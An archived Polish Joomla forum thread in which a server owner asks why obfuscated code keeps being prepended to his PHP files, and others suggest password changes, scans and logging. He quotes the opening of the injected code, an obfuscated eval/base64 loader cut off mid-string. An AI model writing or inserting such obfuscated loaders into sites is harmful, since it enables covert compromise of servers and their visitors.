PDA

Zobacz pełną wersję : Doklejony kod do plików *.php



netsoft
09-07-2012, 12:13
Witam
mam serwerek z Apache 2.2 i instalacje joomli 2.5.6, co jakis czas mam podopisywane do plików *.php na poczatku ciągi ( sktypt) znaków:
np dopisano 04.07.2012 :
<?php
?><?php /*versio:2.05*/if (!defined('determinator')){$I11I1=0;$I11I1=pack('H *','6261736536345f6465636f6465');eval($I11I1('JEdM T0JBTFNbJ0lsbDEnXSA9IEFycmF5KCdWRTFRJywnWDJsdWFYUT 0nLCdKblE5Y0dod0onLiduQTknLC......



- wszystkie kataogi i pliki maja wlasciciela www
- wszystkie pliki i katalogi maja pprawo 755
- plik configuration.php prawa 644

- gdzie tkwi problem ? zle ustawienia konfiguracji apacha, php czy joomli ?
- jak się przed tym obronić, bo to się ciągle powtarza .

pomocy :)

mjmartino
09-07-2012, 13:03
Witam
Zmień hasła dostępu do ftp.
Dwa przeskanuj sobie komputer off-line czyli softem który się z bootuje z LIVE CD
Pozdrawiam

netsoft
09-07-2012, 13:11
- brak dostępu przez ftp, usługa wyłaczona

mjmartino
09-07-2012, 13:18
- brak dostępu przez ftp, usługa wyłaczona

Serwer lokalny ? jeśli nie to jaki hosting posiadasz ?

btw. nie chodziło mi oczywiście do ftp z joomli tylko dostęp do konta hostingowego via ftp. ;)

netsoft
09-07-2012, 13:35
- mam wlasny postawiony serwerek
- łacze sie przez ssh

mjmartino
09-07-2012, 13:48
Wychodzi na to że gdzieś masz dziurę.. ciężko od tak stwierdzić..
Zainstaluj jakiś komponent do logowania zmian jak np RSFirewall i to może rozjaśni trochę jak przejrzysz logi...
Hmm
A czy wszystkie kompnenty / Templates są oryginalne z pewnego źródła ?

btw. Zastosuj powyższe rozwiązania gotowe. http://wiki.joomla.pl/index.php/Witryna_po_włamaniu

zwiastun
09-07-2012, 13:55
- mam wlasny postawiony serwerek
- łacze sie przez ssh
To nie jest forum administratorów serwerów. Administrowanie własnym serwerem wymaga sporej wiedzy informatycznej i doświadczenia.
Z informacji:
- "łączysz się przez ssh",
- wszystkie kataogi i pliki maja wlasciciela www
- wszystkie pliki i katalogi maja pprawo 755
- plik configuration.php prawa 644

można się domyślać, iż Twoja wiedza na temat zabezpieczeń serwera jest znikoma.
Poszukaj dobrej książki o administrowaniu serwerem, poszukaj materiałów w Sieci.